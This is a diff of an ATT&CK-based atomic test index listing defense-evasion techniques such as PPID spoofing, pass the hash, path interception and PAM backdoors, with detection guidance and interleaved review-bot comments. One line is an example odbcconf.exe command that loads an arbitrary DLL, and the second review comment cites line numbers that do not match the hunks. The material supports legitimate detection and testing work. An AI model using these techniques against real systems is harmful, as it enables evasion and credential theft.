+ T1070.005:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.005
- url: https://attack.mitre.org/techniques/T1551/005
+ external_id: T1070.005
+ url: https://attack.mitre.org/techniques/T1070/005
- url: https://technet.microsoft.com/bb490717.aspx
description: Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.
source_name: Technet Net Use
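Review bot: The entry key and `external_id` move from T1551.005 to T1070.005 (`+ T1070.005:` / `+ external_id: T1070.005`), but the `modified` timestamp in the following hunk stays at 2020-01-31 and the atomic test GUID is carried over unchanged, so nothing in the data records that this identifier supersedes T1551.005. Any consumer that still resolves atomics by the old technique id — a per-technique directory, a saved report, an external link — will silently find no entry. If the index is generated from the atomics tree, confirm the T1551.005 atomic directory was renamed in the same commit; otherwise consider carrying the superseded id on the entry (field name illustrative), e.g. `superseded_id: T1551.005`, so the remap is discoverable.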
@@ -27272,13 +28095,16 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-01-31T12:39:18.816Z'
created: '2020-01-31T12:39:18.816Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Established network share connection to a remote system. Level of access depends
+ on permissions of the account used.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_detection: Network share connections may be common depending on how
an network environment is used. Monitor command-line invocation of net
use commands associated with establishing and removing remote shares
@@ -27289,17 +28115,14 @@ defense-evasion:
determining when authenticated network shares are established and by which
account, and can be used to correlate network share activity to other events
to investigate potentially malicious activity.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Established network share connection to a remote system. Level of access depends
- on permissions of the account used.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.005
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ identifier: T1070.005
atomic_tests:
- name: Add Network Share
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
@@ -27417,9 +28240,9 @@ defense-evasion:
Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands
executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
Environment variables, aliases, characters, and other platform/language specific
- semantics can be used to evade signature based detections and whitelisting
- mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation
- July 2017)(Citation: PaloAlto EncodedCommand March 2017) "
+ semantics can be used to evade signature based detections and application
+ control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye
+ Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) "
name: Obfuscated Files or Information
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
@@ -27427,12 +28250,33 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:03:09.892Z'
+ modified: '2020-06-20T22:14:08.350Z'
created: '2017-05-31T21:30:32.662Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - Red Canary
+ - Christiaan Beek, @ChristiaanBeek
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process use of network
+ - File monitoring
+ - Malware reverse engineering
+ - Binary file metadata
+ - Process command-line parameters
+ - Environment variable
+ - Process monitoring
+ - Windows event logs
+ - Network intrusion detection system
+ - Email gateway
+ - SSL/TLS inspection
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Host intrusion prevention systems
+ - Application control
+ - Log analysis
+ - Application control by file name or path
x_mitre_detection: "Detection of file obfuscation is difficult unless artifacts
are left behind by the obfuscation process that are uniquely detectable with
a signature. If detection of the obfuscation itself is not possible, it may
@@ -27458,32 +28302,10 @@ defense-evasion:
with an operation, assuming that individual events like an anti-virus detect
will not be investigated or that an analyst will not be able to conclusively
link that event to other activity occurring on the network. "
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Host intrusion prevention systems
- - Application whitelisting
- - Process whitelisting
- - Log analysis
- - Whitelisting by file name or path
- x_mitre_data_sources:
- - Network protocol analysis
- - Process use of network
- - File monitoring
- - Malware reverse engineering
- - Binary file metadata
- - Process command-line parameters
- - Environment variable
- - Process monitoring
- - Windows event logs
- - Network intrusion detection system
- - Email gateway
- - SSL/TLS inspection
- x_mitre_contributors:
- - Red Canary
- - Christiaan Beek, @ChristiaanBeek
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
@@ -27599,8 +28421,8 @@ defense-evasion:
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft
odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries
- may abuse odbcconf.exe to bypass application whitelisting solutions that do
- not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010),
+ may abuse odbcconf.exe to bypass application control solutions that do not
+ account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010),
odbcconf.exe has a REGSVR flag that can be misused to execute
DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}).
(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation:
@@ -27634,27 +28456,27 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:01:32.793Z'
+ modified: '2020-06-20T22:39:00.717Z'
created: '2020-01-24T15:01:32.917Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history
of known good arguments and loaded DLLs to determine anomalous and potentially
adversarial activity. Command arguments used before and after the invocation
of odbcconf.exe may also be useful in determining the origin and purpose of
the DLL being loaded.
- x_mitre_data_sources:
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.008
atomic_tests:
- name: Odbcconf.exe - Execute Arbitrary DLL
@@ -27708,10 +28530,10 @@ defense-evasion:
url: https://blog.xpnsec.com/becoming-system/
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
- - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
- Retrieved June 4, 2019.
+ - source_name: Microsoft Process Creation Flags May 2018
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Microsoft Process Creation Flags May 2018
+ description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
+ Retrieved June 4, 2019.
- description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
@@ -27723,7 +28545,7 @@ defense-evasion:
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
- Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+ Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
@@ -27733,28 +28555,28 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:45:30.415Z'
+ modified: '2020-04-16T19:37:02.030Z'
created: '2020-02-18T18:22:41.448Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Windows event logs
+ x_mitre_contributors:
+ - Wayne Silva, F-Secure Countercept
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Heuristic Detection
+ - Host forensic analysis
x_mitre_detection: |-
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.
- x_mitre_defense_bypassed:
- - Heuristic Detection
- - Host forensic analysis
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Wayne Silva, Countercept
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - Windows event logs
+ x_mitre_platforms:
+ - Windows
identifier: T1134.004
atomic_tests:
- name: Parent PID Spoofing using PowerShell
@@ -27835,21 +28657,21 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-23T16:24:34.766Z'
created: '2020-01-30T16:36:51.184Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Audit all logon and credential use events and review for
discrepancies. Unusual remote logins that correlate with other suspicious
activity (such as writing and executing binaries) may indicate malicious activity.
NTLM LogonType 3 authentications that are not associated to a domain login
and are not anonymous logins are suspicious.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -27963,23 +28785,23 @@ defense-evasion:
phase_name: lateral-movement
modified: '2020-03-12T17:03:16.122Z'
created: '2020-01-30T17:03:43.072Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Vincent Le Toux
- - Ryan Becwar
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)
- x_mitre_system_requirements:
- - Kerberos authentication enabled
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ryan Becwar
+ x_mitre_platforms:
+ - Windows
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
@@ -28045,22 +28867,22 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-25T20:59:05.209Z'
created: '2020-02-11T19:05:45.829Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
@@ -28095,6 +28917,17 @@ defense-evasion:
elevation_required: true
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -28102,17 +28935,6 @@ defense-evasion:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -28121,7 +28943,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -28137,10 +28959,33 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
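Review bot: The `x_mitre_defense_bypassed` value on L90735 changes from the literal `Process whitelisting` to `Application control`, and the same substitution appears in the later hunks at L91123, L90984–L90986, L91146–L91148, L91190–L91192 and L91229 onward, but nothing in the change records that the vocabulary itself moved. Any downstream filter, mapping table or test fixture that still matches the old string will silently match nothing after this update. If this file is regenerated from the upstream ATT&CK bundle (as the timestamp-only and key-reorder hunks suggest), the rename is upstream data and should not be hand-edited here, but it is worth a one-line note in the commit description such as `defense_bypassed vocabulary: "Process whitelisting" is now "Application control" across all techniques`.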
@@ -28163,29 +29008,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -28210,17 +29032,16 @@ defense-evasion:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -28244,16 +29065,17 @@ defense-evasion:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -28297,12 +29119,75 @@ defense-evasion:
del "C:\Time.log"
name: command_prompt
elevation_required: true
- T1545.001:
+ T1556.003:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1556.003
+ url: https://attack.mitre.org/techniques/T1556/003
+ - source_name: Apple PAM
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ - source_name: Man Pam_Unix
+ url: https://linux.die.net/man/8/pam_unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ - source_name: Red Hat PAM
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ - source_name: PAM Backdoor
+ url: https://github.com/zephrax/linux-pam-backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ - source_name: PAM Creds
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Pluggable Authentication Modules
+ description: |-
+ Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
+
+ Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
+
+ Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-13T21:23:01.370Z'
+ created: '2020-06-26T04:01:09.648Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
+ x_mitre_detection: |-
+ Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
+
+ Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ x_mitre_contributors:
